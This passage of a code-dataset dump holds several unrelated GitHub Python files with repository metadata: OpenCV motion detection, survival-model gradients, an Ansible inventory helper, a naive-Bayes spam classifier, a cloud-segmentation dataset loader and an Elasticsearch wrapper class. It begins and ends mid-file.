cv2.getTrackbarPos('alpha', 'frame')\n kernel_open = cv2.getTrackbarPos('opening','frame')\n kernel_close = cv2.getTrackbarPos('closing','frame')\n\n # Stabilize image #\n if stabilize:\n greyFrame = cv2.cvtColor(currFrame, cv2.COLOR_BGR2GRAY)\n currKP, currDes = orb.detectAndCompute(greyFrame, None)\n # currKP, currDes = fast.detectAndCompute(greyFrame, None)\n\n #Match\n matches = flann.knnMatch(refDes, currDes, k=2)\n # Apply ratio test\n good = []\n for m_n in matches:\n if len(m_n) != 2:\n continue\n (m, n) = m_n\n if m.distance < 0.75 * n.distance:\n good.append(m)\n\n print(len(good))\n\n # perspective change\n if len(good) > MIN_MATCH_COUNT:\n\n src_pts = np.float32([refKP[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n dst_pts = np.float32([currKP[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n matchesMask = mask.ravel().tolist()\n\n h, w, depth = currFrame.shape\n currFrame = cv2.warpPerspective(currFrame, M, (w, h))\n\n # #TODO debug drawing FAST features\n # pts = np.float32([[0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n # dst = cv2.perspectiveTransform(pts, M)\n # flowFrame = cv2.polylines(currFrame, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)\n else:\n print(\"Not enough matches are found - %d/%d\" % (len(good), MIN_MATCH_COUNT))\n matchesMask = None\n\n # blurFrame = cv2.blur(currFrame, (5, 5))\n\n # Running Average #\n # Implement running average and get mask from background\n cv2.accumulateWeighted(currFrame, avg, alpha/100)\n running_res = cv2.convertScaleAbs(avg)\n avg_frame = running_res\n\n # Subtract this from current frame to get moving parts?\n running_res = cv2.absdiff(currFrame, running_res)\n _, running_res_thres = cv2.threshold(running_res, thrs_avg, 255, cv2.THRESH_BINARY)\n\n\n # Temperal difference #\n # Implement temperal difference and get mask\n diff_frame = cv2.absdiff(currFrame, prevFrame)\n _, diff_frame_thres = cv2.threshold(diff_frame, thrs_td, 255, cv2.THRESH_BINARY)\n\n # Logic AND masks together #\n moving_objs = cv2.bitwise_and(running_res, diff_frame)\n bg_subtracted = cv2.bitwise_and(currFrame, currFrame, mask=diff_frame)\n\n # Morphology to remove noise #\n kernel_open = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_open,kernel_open))\n kernel_close = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_close,kernel_close))\n\n morphImg = cv2.morphologyEx(moving_objs, cv2.MORPH_OPEN, kernel_open)\n morphImg = cv2.morphologyEx(morphImg, cv2.MORPH_CLOSE, kernel_close)\n\n # Connected components to get moving objects #\n\n # # You need to choose 4 or 8 for connectivity type\n # connectivity = 4\n # # Perform the operation\n # output = cv2.connectedComponentsWithStats(morphImg, connectivity, cv2.CV_32S)\n # # Get the results\n # # The first cell is the number of labels\n # num_labels = output[0]\n # # The second cell is the label matrix\n # labels = output[1]\n # # The third cell is the stat matrix\n # stats = output[2]\n # # The fourth cell is the centroid matrix\n # centroids = output[3]\n #\n # for i in range(0, len(centroids)):\n # top = stats[i, cv2.CC_STAT_TOP]\n # left = stats[i, cv2.CC_STAT_LEFT]\n # width = stats[i, cv2.CC_STAT_WIDTH]\n # height = stats[i, cv2.CC_STAT_HEIGHT]\n #\n # if stats[i, cv2.CC_STAT_AREA] < cc_min: continue\n #\n # cv2.rectangle(outFrame, (left, top), (left + width, top + height), (0, 0, 255), 2)\n # cv2.rectangle(morphImg, (left, top), (left + width, top + height), (0, 0, 255), 2)\n #\n # # cv2.putText(currFrame, 'Car Detected', (left + width + 10, top + height), 0, 0.3, (0, 0, 255))\n\n prevFrame = currFrame\n\n cv2.imshow('frame', morphImg)\n cv2.imshow('avg', running_res)\n cv2.imshow('TD', diff_frame)\n cv2.imshow('TD_thres', diff_frame_thres)\n cv2.imshow('avg_thres', running_res_thres)\n cv2.imshow('avg_frame', avg_frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Crowdedlight/ROVI2","sub_path":"Excercises/Miniproject2/traffic_analyse_running_avg_temperal_diff.py","file_name":"traffic_analyse_running_avg_temperal_diff.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"69944340626","text":"\"\"\"\nGRADIENT METHODS FOR MLL FITTING\n\"\"\"\n\n# External modules\nimport warnings\nimport numpy as np\n\n# Internal modules\nfrom paranet.utils import broadcast_dist, format_t_d_scale_shape, dist2idx\n\n# Supress overflow warnings\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\n\n\ndef log_lik(t:np.ndarray, d:np.ndarray, scale:np.ndarray, shape:np.ndarray or None, dist:str) -> np.ndarray:\n \"\"\"\n CALCULATES THE LOG-LIKELIHOOD\n\n Inputs\n ------\n t: A [n,k] or (n,) matrix/array of time-to-event values\n d: A [n,k] or (n,) matrix/array of censoring values (1=event, 0=right-censored)\n scale: See (SurvDists): equivilent to lambda\n shape: See (SurvDists): equivilent to alpha\n dist: A valid distribution (currently: exponential, weibull, or gompertz)\n\n Returns\n ------\n ll: A (k,) array of log-likelihoods\n \"\"\"\n # Note that this will broadcast t wide if k > 1\n t_vec, d_vec, scale, shape = format_t_d_scale_shape(t, d, scale, shape)\n k = scale.shape[1]\n ll_vec = np.zeros(k)\n # Calculate negative mean of log-likelihood\n dist = broadcast_dist(dist, k)\n didx = dist2idx(dist)\n for d, i in didx.items():\n if d == 'exponential':\n ll_vec[i] = -np.mean(d_vec[:,i] * np.log(scale[:,i]) - scale[:,i]*t_vec[:,i], axis=0)\n if d == 'weibull':\n ll_vec[i] = -np.mean(d_vec[:,i]*(np.log(shape[:,i]*scale[:,i]) + (shape[:,i]-1)*np.log(t_vec[:,i])) - scale[:,i]*t_vec[:,i]**shape[:,i], axis=0)\n if d == 'gompertz':\n ll_vec = -np.mean(d_vec[:,i]*(np.log(scale[:,i])+shape[:,i]*t_vec[:,i]) - scale[:,i]/shape[:,i]*(np.exp(shape[:,i]*t_vec[:,i])-1), axis=0)\n return ll_vec\n\n\ndef grad_ll(t:np.ndarray, d:np.ndarray, scale:np.ndarray, shape:np.ndarray or None, dist:str) -> np.ndarray:\n \"\"\"\n CALCULATE GRADIENT FOR FOR SHAPE AND SCALE PARAMETER\n\n Inputs\n ------\n See log_like\n\n Returns\n -------\n grad: An [p,k] matrix, where the first row corresponds to the shape parameter \n \"\"\"\n grad_alph = grad_ll_shape(t, d, scale, shape, dist)\n grad_lam = grad_ll_scale(t, d, scale, shape, dist)\n # Place shape/alpha in position zero\n grad = np.vstack([grad_alph, grad_lam])\n return grad\n\n\ndef grad_ll_scale(t:np.ndarray, d:np.ndarray, scale:np.ndarray, shape:np.ndarray or None, dist:str) -> np.ndarray:\n \"\"\"\n CALCULATES GRADIENT FOR FOR SCALE PARAMETER\n\n Inputs\n ------\n See log_like\n\n Returns\n -------\n dll: An (k,) array of gradients\n \"\"\"\n t_vec, d_vec, scale, shape = format_t_d_scale_shape(t, d, scale, shape)\n k = scale.shape[1]\n dll_vec = np.zeros(k)\n # Calculate negative gradient of log-likelihood\n dist = broadcast_dist(dist, k)\n didx = dist2idx(dist)\n for d, i in didx.items():\n if d == 'exponential':\n dll_vec[i] = -np.mean(d_vec[:,i]/scale[:,i] - t_vec[:,i], axis=0)\n if d == 'weibull':\n dll_vec[i] = -np.mean(d_vec[:,i]/scale[:,i] - t_vec[:,i]**shape[:,i], axis=0)\n if d == 'gompertz':\n dll_vec[i] = -np.mean(d_vec[:,i]/scale[:,i] - (np.exp(shape[:,i]*t_vec[:,i]) - 1)/shape[:,i], axis=0)\n return dll_vec\n\n\ndef grad_ll_shape(t:np.ndarray, d:np.ndarray, scale:np.ndarray, shape:np.ndarray or None, dist:str) -> np.ndarray:\n \"\"\"\n CALCULATES GRADIENT FOR FOR SHAPE PARAMETER\n\n Inputs\n ------\n See log_like\n\n Returns\n -------\n dll: An (k,) array of gradients\n \"\"\"\n t_vec, d_vec, scale, shape = format_t_d_scale_shape(t, d, scale, shape)\n k = scale.shape[1]\n dll_vec = np.zeros(k)\n # Calculate negative gradient of log-likelihood\n dist = broadcast_dist(dist, k)\n didx = dist2idx(dist)\n for d, i in didx.items():\n if d == 'exponential':\n dll_vec[i] = -np.repeat(0, len(i))\n if d == 'weibull':\n dll_vec[i] = -np.mean( d_vec[:,i]*(1/shape[:,i] + np.log(t_vec[:,i])) - scale[:,i]*t_vec[:,i]**shape[:,i]*np.log(t_vec[:,i]), axis=0)\n if d == 'gompertz':\n dll_vec[i] = -np.mean( d_vec[:,i]*t_vec[:,i] - (scale[:,i]/shape[:,i]**2)*(np.exp(shape[:,i]*t_vec[:,i])*(shape[:,i]*t_vec[:,i]-1) +1), axis=0)\n return dll_vec\n\n\n\n\n\n\n\n\n\n","repo_name":"ErikinBC/paranet","sub_path":"paranet/univariate/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17628316376","text":"# Ansible dynamic inventory\n# - Top-level: Holistic inverntory with groups info and hosts\n# - hmap: ._meta.hostvars\n\nimport re\n\ninv = None\nhmap = None\n\ndef new(_inv):\n global hmap\n global inv\n inv = _inv\n hmap = hmap_get()\n\ndef hmap_get():\n if not inv: print(\"No inventory registered !!\"); exit(1)\n hmap = inv.get(\"_meta\", {}).get(\"hostvars\", {})\n return hmap\n\n# Init hostmap: add stuff, delete stuff (index stuff ?)\ndef hmap_init(hmap):\n # \n # Work on whole inv ? inv.get('_meta'). ...\n for hk in hmap.keys():\n hnode = hmap.get(hk)\n hnode[\"hname\"] = hk;\n #delete hnode \"metadata\", disks.shieldedInstanceInitialState\n # metadata has also cluster-name and cluster_name, cluster-location\n del hnode['metadata'] # hnode.pop(\"metadata\", None)\n hnode[\"region\"] = zone2reg( hnode[\"zone\"] ) # Add region implied by zone\n\n# Convert zone to implied parent region\ndef zone2reg(z):\n r = re.sub(r'-[a-z]$', '', z)\n return r\n\ndef hnode_get(n):\n if not isinstance(hmap, dict): print(\"hmap (in module) is not dict\"); exit(1)\n h = hmap.get(n, None)\n # if not h: \n return h\n\n# Query disk properties like 'deviceName' or 'diskSizeGb'\n# Note: Ansible inventory does not have disk 'Name' (gcloud output does)\ndef hnode_disk_prop(h, prop):\n d = h.get(\"disks\", [None])[0]\n if not d: print(\"No disk for host \"+h); return None\n return d.get(prop)\n\n# Get First Net-if (networkInterfaces[0])\ndef netif(h, **kwargs):\n nifarr = h.get(\"networkInterfaces\")\n if not nifarr: return None\n if not nifarr[0]: return None\n if kwargs.get(\"ipaddr\"): return nifarr[0].get(\"networkIP\")\n if not isinstance(nifarr[0], dict): return None\n return nifarr[0]\n","repo_name":"ohollmen/dputpy","sub_path":"ansdi.py","file_name":"ansdi.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10794664586","text":"from dataclasses import make_dataclass\nfrom typing import Any, Dict, List, Set, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\n\nMetricValue = Union[\n Any, List[Any], Set[Any], Tuple[Any, ...], pd.DataFrame, pd.Series, np.ndarray\n]\nMetricValues = Union[\n MetricValue, List[MetricValue], Set[MetricValue], Tuple[MetricValue, ...]\n]\nMetricComputationDetails = Dict[str, Any]\nMetricComputationResult = make_dataclass(\n \"MetricComputationResult\", [\"attributed_resolved_metrics\", \"details\"]\n)\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/great-expectations/venv/lib/python3.8/site-packages/great_expectations/rule_based_profiler/types/metric_computation_result.py","file_name":"metric_computation_result.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"13451399901","text":"#!/usr/bin/env python3\n\n# Author: Patrik Segedy \n# File: detector.py\n# Description: Simple antispam using machine learning for BIS class\n\nimport os\nimport sys\nimport email.parser\nimport email.message\nimport email.policy\nimport html2text\nfrom pandas import DataFrame\nimport numpy\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.externals import joblib\n\n\nDEFAULT_CHARSET = 'latin-1'\n# http://www2.aueb.gr/users/ion/data/enron-spam/\n# + private e-mails\nDATASET = [\n ('ham/beck-s', False),\n ('ham/kaminski-v', False),\n ('priklady/emaily', False),\n ('ham/Inbox_20171208-1919', False),\n ('ham/farmer-d', False),\n # ('ham/kitchen-l', False),\n # ('ham/lokay-m', False),\n # ('ham/williams-w3', False),\n # ('spam/GP', True),\n # ('spam/BG', True),\n ('spam/SH', True),\n ('priklady/spamy', True)\n]\n\n\ndef read_dataset(path):\n \"\"\"Read dataset and yield file path and content of email body\"\"\"\n for root, dirs, files in os.walk(path):\n for file in files:\n file_path = (os.path.join(root, file))\n with open(file_path, 'rb') as f:\n try:\n msg = email.message_from_binary_file(f, policy=email.policy.default)\n try:\n msg_body = msg.get_body(preferencelist=('html', 'plain'))\n msg_body_payload = msg_body.get_payload(decode=True)\n charset = msg_body.get_content_charset(DEFAULT_CHARSET)\n except:\n msg_body_payload = msg.get_payload(decode=True)\n charset = msg.get_content_charset(DEFAULT_CHARSET)\n # try to decode payload\n try:\n msg_payload_decoded = msg_body_payload.decode(charset)\n except:\n charset = DEFAULT_CHARSET\n msg_payload_decoded = msg_body_payload.decode(charset)\n\n lines = [html2text.html2text(line).strip() for line in msg_payload_decoded.splitlines() if html2text.html2text(line).strip()]\n except:\n lines = []\n\n yield file_path, \"\".join(lines)\n\n\ndef make_data_frame(path, is_spam):\n \"\"\"Construct DataFrame from email body and class (spam/ham)\"\"\"\n rows = []\n index = []\n for file, content in read_dataset(path):\n rows.append({'content': content, 'class': is_spam})\n index.append(file)\n\n data_frame = DataFrame(rows, index=index)\n return data_frame\n\n\ndef train_model():\n # add data to dataframe\n data = DataFrame({'content': [], 'class': []})\n for path, is_spam in DATASET:\n data = data.append(make_data_frame(path, is_spam))\n\n # shuffle dataset\n data = data.reindex(numpy.random.permutation(data.index))\n\n # count number of words, frequentions, and classify\n pipeline = Pipeline([\n ('count_vectorizer', CountVectorizer(ngram_range=(1, 2))),\n ('tfidf_transformer', TfidfTransformer()),\n ('classifier', MultinomialNB())\n ])\n # fit data\n pipeline.fit(data['content'].values, data['class'].values)\n\n # dump classifier\n joblib.dump(pipeline, 'trained_data.pkl', compress=9)\n\n return pipeline\n\n\ndef classify(model, emails):\n \"\"\"Classify given email body\"\"\"\n return model.predict(emails)\n\n\ndef read_argv():\n \"\"\"Read emails from argv, and yield file name and email body\"\"\"\n for arg in sys.argv[1:]:\n try:\n with open(arg, 'rb') as f:\n msg = email.message_from_binary_file(f, policy=email.policy.default)\n try:\n msg_body = msg.get_body(preferencelist=('html', 'plain'))\n msg_body_payload = msg_body.get_payload(decode=True)\n charset = msg_body.get_content_charset(DEFAULT_CHARSET)\n except:\n msg_body_payload = msg.get_payload(decode=True)\n charset = msg.get_content_charset(DEFAULT_CHARSET)\n # try to decode payload\n try:\n msg_payload_decoded = msg_body_payload.decode(charset)\n except:\n charset = DEFAULT_CHARSET\n msg_payload_decoded = msg_body_payload.decode(charset)\n\n lines = [html2text.html2text(line).strip() for line in msg_payload_decoded.splitlines() if html2text.html2text(line).strip()]\n except:\n print(arg, '- FAIL')\n continue\n\n yield arg, \"\".join(lines)\n\nif __name__ == '__main__':\n train_model()\n # load classifier\n model = joblib.load('trained_data.pkl')\n for file, content in read_argv():\n prediction = classify(model, [content])\n if prediction[0] == 1.0:\n print(file, '- SPAM')\n elif prediction[0] == 0.0:\n print(file, '- OK')\n","repo_name":"psegedy/antispam","sub_path":"antispam.py","file_name":"antispam.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3345115696","text":"from pathlib import Path\nfrom torch.utils.data import Dataset, DataLoader, sampler\nfrom PIL import Image\nimport torch\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nfrom torch import nn\n\n\nclass CloudDastaset(Dataset):\n def __init__(self, r_dir, g_dir, b_dir, nir_dir, gt_dir, pytorch=True):\n super().__init__()\n # For each image in red folder, we get it's path \"f\", and create a list of dictionaries containing each path for each channel\n self.files = [\n self.combine_files(f, g_dir, b_dir, nir_dir, gt_dir)\n for f in r_dir.iterdir()\n if not f.is_dir()\n ]\n self.pytorch = pytorch\n\n # given a red image file path it returns a dictionary with the image path of each channel\n def combine_files(self, r_file: Path, g_dir, b_dir, nir_dir, gt_dir):\n\n files = {\n \"red\": r_file,\n \"green\": g_dir / r_file.name.replace(\"red\", \"green\"),\n \"blue\": b_dir / r_file.name.replace(\"red\", \"blue\"),\n \"nir\": nir_dir / r_file.name.replace(\"red\", \"nir\"),\n \"gt\": gt_dir / r_file.name.replace(\"red\", \"gt\"),\n }\n\n return files\n\n def __len__(self):\n return len(self.files)\n\n def open_as_array(self, idx, invert=False, include_nir=False):\n\n raw_rgb = np.stack(\n [\n np.array(Image.open(self.files[idx][\"red\"])),\n np.array(Image.open(self.files[idx][\"green\"])),\n np.array(Image.open(self.files[idx][\"blue\"])),\n ],\n axis=2,\n )\n\n if include_nir:\n nir = np.expand_dims(np.array(Image.open(self.files[idx][\"nir\"])), 2)\n raw_rgb = np.concatenate([raw_rgb, nir], axis=2)\n\n if invert:\n raw_rgb = raw_rgb.transpose((2, 0, 1))\n\n # normalize\n return raw_rgb / np.iinfo(raw_rgb.dtype).max\n\n def open_mask(self, idx, add_dims=False):\n\n raw_mask = np.array(Image.open(self.files[idx][\"gt\"]))\n raw_mask = np.where(raw_mask == 255, 1, 0)\n\n return np.expand_dims(raw_mask, 0) if add_dims else raw_mask\n\n def __getitem__(self, idx):\n\n x = torch.tensor(\n self.open_as_array(idx, invert=self.pytorch, include_nir=True),\n dtype=torch.float32,\n )\n y = torch.tensor(self.open_mask(idx, add_dims=False), dtype=torch.torch.int64)\n\n return x, y\n\n def open_as_pil(self, idx):\n\n arr = 256 * self.open_as_array(idx)\n\n return Image.fromarray(arr.astype(np.uint8), \"RGB\")\n\n def __repr__(self):\n s = \"Dataset class with {} files\".format(self.__len__())\n\n return s\n","repo_name":"LeBrav/CloudSegmentation","sub_path":"workspace/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32578583089","text":"import sys\nimport time\nimport collections\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import (\n scan,\n bulk,\n parallel_bulk,\n streaming_bulk,\n)\nfrom .base import BaseDatabase\nfrom ..helpers import expand_envvars\nfrom typing import (\n Any,\n List,\n Dict,\n Tuple,\n Union,\n Iterable,\n Iterator,\n)\n\n\n__all__ = ['ElasticsearchDatabase']\n\n\nclass Elasticsearchx(Elasticsearch):\n \"\"\"Elasticsearch database interface extended with helper methods.\"\"\"\n\n def bulkx(\n self,\n actions: Iterable[Dict[str, Any]],\n *,\n stream: bool = False,\n thread_count: int = 1,\n **kwargs\n ) -> Tuple[int, List[Any]]:\n \"\"\"Extended bulk API.\n\n Args:\n actions (Iterable[Dict[str, Any]]): Actions for 'Helpers.*bulk()'.\n https://elasticsearch-py.readthedocs.io/en/master/helpers.html#elasticsearch.helpers.bulk\n\n stream (bool): If set, use streaming bulk instead of bulk API.\n\n thread_count (int): Number of threads for parallel bulk API.\n If single threaded, use bulk API.\n\n Kwargs: Options forwarded to 'elasticsearch.helpers.*bulk()' functions.\n\n Notes:\n * 'streaming_bulk()' and 'parallel_bulk()' return generators\n which need to be consumed for operation to complete.\n \"\"\"\n if stream:\n response = streaming_bulk(self, actions, **kwargs)\n elif thread_count == 1:\n response = bulk(self, actions, **kwargs)\n else:\n response = parallel_bulk(\n self,\n actions,\n thread_count=thread_count,\n **kwargs\n )\n return response\n\n def bulk_index(\n self,\n documents: Iterable[Dict[str, Any]],\n *,\n index: str,\n op_type: str = 'index',\n ids: Iterable[str] = None,\n **kwargs\n ) -> Tuple[int, List[Any]]:\n \"\"\"Bulk index and create documents.\n\n Args:\n documents (Iterable[Dict[str, Any]]): List of document\n fields/values to index.\n\n index (str): Index name to search.\n\n op_type (str): Explicit operation type. Valid values are 'index'\n and 'create'.\n\n ids (Iterable[str]): Document ID. If set to None, ES sets\n random ones.\n\n Kwargs: Options forwarded to 'bulkx()'.\n \"\"\"\n if ids is None:\n actions = (\n {'_op_type': op_type, '_index': index, '_source': document}\n for document in documents\n )\n else:\n actions = (\n {\n '_op_type': op_type,\n '_index': index,\n '_source': document,\n '_id': id,\n } for id, document in zip(ids, documents)\n )\n return self.bulkx(actions, **kwargs)\n\n def scan(\n self,\n body: Dict[str, Any],\n *,\n index: Union[str, List[str]],\n **kwargs\n ) -> Iterator[Dict[str, Any]]:\n \"\"\"Scan/scroll through documents.\n\n Args:\n body (Dict[str, Any]): Body for 'Helpers.scan()'.\n https://elasticsearch-py.readthedocs.io/en/master/helpers.html#scan\n\n index (Union[str, List[str]]): Index names to search.\n https://elasticsearch-py.readthedocs.io/en/master/api.html#elasticsearch.Elasticsearch.search\n\n Kwargs: Options forwarded to 'elasticsearch.helpers.scan()'.\n \"\"\"\n return scan(self, body, index=index, **kwargs)\n\n\nclass ElasticsearchDatabase(BaseDatabase):\n \"\"\"Elasticsearch database interface.\n\n Elasticsearch database interface with limited key/value related\n methods.\n\n Args:\n hosts (Any): Elasticsearch host(s).\n\n index (str): Index name.\n\n index_body (Dict[str, Any]): Mapping and settings for index.\n If None, the index uses dynamic mapping, see\n https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping.html#_dynamic_mapping\n\n access_mode (str): Access mode for database.\n Valid values are: 'r' = read-only, 'w' = read/write,\n 'c' = read/write/create if not exists, 'n' = new read/write.\n\n use_pipeline (bool): If set, queue 'set-related' commands to database.\n Run 'commit()' command to submit commands in pipe.\n\n connect (bool): If set, automatically connect during initialization.\n\n stream (bool): If set, use streaming bulk instead of bulk API.\n\n thread_count (int): Number of threads for parallel bulk API.\n If single threaded, use bulk API.\n\n max_connect_attempts (int): Number of times to attempt connecting to\n database during object instantiation. There is no connection\n handling if connection disconnects at any other moment.\n\n Kwargs: Options forwarded to 'Elasticsearch()' via 'Elasticsearchx()'.\n \"\"\"\n\n NAME = 'elasticsearch'\n\n def __init__(\n self,\n index: str = 'test',\n *,\n index_body: Dict[str, Any] = None,\n hosts: Any = 'localhost:9200',\n access_mode: str = 'c',\n use_pipeline: bool = False,\n connect: bool = True,\n stream: bool = False,\n thread_count: int = 1,\n max_connect_attempts: int = 1,\n **conn_info,\n ):\n self._conn = None\n self._pipeline = None\n self._hosts = hosts\n self._index = index\n self._index_body = index_body\n self._access_mode = access_mode\n self._use_pipeline = use_pipeline\n self._stream = stream\n self._thread_count = thread_count\n self._max_connect_attempts = max_connect_attempts\n self._conn_info = conn_info\n\n if connect:\n self.connect()\n else:\n self._pre_connect()\n\n def _pre_connect(self, **kwargs):\n self._hosts = kwargs.pop('hosts', self._hosts)\n self._index = expand_envvars(kwargs.pop('index', self._index))\n self._index_body = kwargs.pop('index_body', self._index_body)\n self._access_mode = kwargs.pop('access_mode', self._access_mode)\n self._use_pipeline = kwargs.pop('use_pipeline', self._use_pipeline)\n self._stream = kwargs.pop('stream', self._stream)\n self._thread_count = kwargs.pop('thread_count', self._thread_count)\n self._max_connect_attempts = kwargs.pop(\n 'max_connect_attempts',\n self._max_connect_attempts,\n )\n self._conn_info.update(kwargs)\n\n def _post_connect(self):\n if self._access_mode in ('c', 'n'):\n if self._access_mode == 'n':\n self.clear()\n\n if not self._conn.indices.exists(index=self._index):\n self._conn.indices.create(\n index=self._index,\n body=self._index_body,\n )\n\n if self._use_pipeline:\n self._pipeline = {}\n\n def __len__(self):\n return self._conn.count(index=self._index)['count']\n\n def __contains__(self, id):\n return NotImplemented\n\n def __getitem__(self, id):\n return NotImplemented\n\n def __setitem__(self, id, body):\n self.set(body, id=id)\n\n def __delitem__(self, id):\n self._conn.delete(index=self._index, id=id)\n\n def __iter__(self):\n return self.ids()\n\n @property\n def backend(self):\n return self._conn\n\n def configuration(self):\n is_connected = self.ping()\n return {\n 'connected': is_connected,\n 'hosts': self._hosts,\n 'index': self._index,\n 'access mode': self._access_mode,\n 'pipelined': self._use_pipeline,\n 'stream': self._stream,\n 'thread count': self._thread_count,\n 'max connect attempts': self._max_connect_attempts,\n 'nrows': len(self) if is_connected else -1,\n 'store': (\n self._conn.indices.stats(\n index=self._index,\n )['_all']['primaries']['store']['size_in_bytes']\n if is_connected\n else -1\n ),\n 'mapping': (\n self._conn.indices.get_mapping(index=self._index)\n if is_connected\n else {}\n ),\n 'settings': (\n self._conn.indices.get_settings(index=self._index)\n if is_connected\n else {}\n ),\n }\n\n def info(self, **kwargs):\n return self._conn.info(**kwargs)\n\n def index_stats(self, **kwargs):\n return self._conn.indices.stats(index=self._index, **kwargs)\n\n def get(self, query: Dict[str, Any], *, key=None, **kwargs):\n \"\"\"\n Args:\n key (Any): A hashable value that is unique for the document,\n that is used as a key for storing in pipeline dictionary.\n \"\"\"\n if self._use_pipeline and key is not None and key in self._pipeline:\n return self._pipeline[key]\n return self._conn.search(index=self._index, body=query, **kwargs)\n\n def set(self, document: Dict[str, Any], *, key=None, **kwargs):\n \"\"\"\n Args:\n key (Any): A hashable value that is unique for the document,\n that is used as a key for storing in pipeline dictionary.\n \"\"\"\n if self._use_pipeline and key is not None:\n self._pipeline[key] = document\n else:\n self._conn.index(index=self._index, body=document, **kwargs)\n\n def scan(self, **kwargs):\n return self._conn.scan({}, index=self._index, **kwargs)\n\n def ids(self, **kwargs):\n return map(\n lambda x: x['_id'],\n self._conn.scan({}, index=self._index, **kwargs),\n )\n\n def items(self, **kwargs):\n return map(\n lambda x: (x['_id'], x['_source']),\n self._conn.scan({}, index=self._index, **kwargs),\n )\n\n def documents(self, **kwargs):\n return map(\n lambda x: x['_source'],\n self._conn.scan({}, index=self._index, **kwargs),\n )\n\n def delete(self, id, **kwargs):\n self._conn.delete(index=self._index, id=id, **kwargs)\n\n def connect(self, **kwargs):\n if self.ping():\n return\n\n self._pre_connect(**kwargs)\n\n for connect_attempt in range(1, self._max_connect_attempts + 1):\n self._conn = Elasticsearchx(self._hosts, **self._conn_info)\n if self._conn.ping():\n break\n print('Warning: failed connecting to Elasticsearch at '\n f'{self._hosts}, reconnection attempt '\n f'{connect_attempt} ...',\n file=sys.stderr)\n time.sleep(1)\n else:\n raise ConnectionError(\n 'failed to connect to Elasticsearch hosts'\n )\n\n self._post_connect()\n\n def commit(self, **kwargs):\n if not self.ping():\n return\n if self._use_pipeline and self._pipeline:\n # NOTE: deque consumes streaming/parallel bulk generators\n # and discards its results.\n collections.deque(\n self._conn.bulk_index(\n self._pipeline.values(),\n index=self._index,\n stream=self._stream,\n thread_count=self._thread_count,\n **kwargs,\n ),\n maxlen=0,\n )\n self._pipeline = {}\n # NOTE: Elasticsearch automatically triggers flushes as needed.\n # These flushes store data in transaction log to Lucene index.\n # self._conn.indices.flush(index=self._index)\n\n def disconnect(self):\n if self.ping():\n self._conn.close()\n self._pipeline = None\n\n def clear(self, **kwargs):\n # NOTE: Elasticsearch does not supports deleting index content,\n # so we delete the index and recreate it.\n self.drop_index(**kwargs)\n self._conn.indices.create(index=self._index, body=self._index_body)\n if self._use_pipeline:\n self._pipeline = {}\n\n def drop_index(self, **kwargs):\n if self._conn.indices.exists(index=self._index):\n self._conn.indices.delete(index=self._index, **kwargs)\n\n def ping(self):\n return self._conn is not None and self._conn.ping()\n","repo_name":"edponce/FACET","sub_path":"facet/database/elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":12503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32213829785","text":"def instructorProfile(id, name, **kwargs):\n print(f\"[{id}]instructor:{name} with expertee\")\n for k, v in kwargs.items():\n print(f\"in {k} field, familiar with {v}\")\n\n\ninstructorProfile(1, \"Mark\")\ninstructorProfile(2, \"Mark\", python=\"Tensorflow\", java=\"Spring\")\ninstructorProfile(3, \"Ken\", mobile=\"iOS\", server=\".NET\", os=\"Linux\")\nskill = {\"js\": \"Async Programming\", \"frontend\": \"React\", \"cryptoCurrency\": \"Ethereum\"}\ninstructorProfile(4,\"Hawk\", **skill)","repo_name":"babyhello/pythonlearn","sub_path":"lab29.py","file_name":"lab29.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31646339317","text":"n = int(input())\na = list(map(int, input().split(' ')))\nnum = 0\nfor i in range(len(a)):\n if a[i] % 2 == 1:\n a[i] -= 1\n if num == 0:\n num += 1\n\ndef isEnd(a):\n flag = a[0]\n for i in range(1, len(a)):\n if a[i] != flag:\n return False\n return True\n\ndef pro_max(a, num1):\n num = 0\n for i in range(len(a)):\n if a[i] == num1:\n a[i] = a[i] // 2\n num += 1\n return num\n\ndef pro_min(a, num1):\n num = 0\n for i in range(len(a)):\n if a[i] == num1:\n a[i] *= 2\n num += 1\n return num\n\n\nwhile (not isEnd(a)):\n _min = min(a)\n _max = max(a)\n _min_count = a.count(_min)\n _max_count = a.count(_max)\n if _min_count < _max_count:\n num += pro_min(a, _min)\n 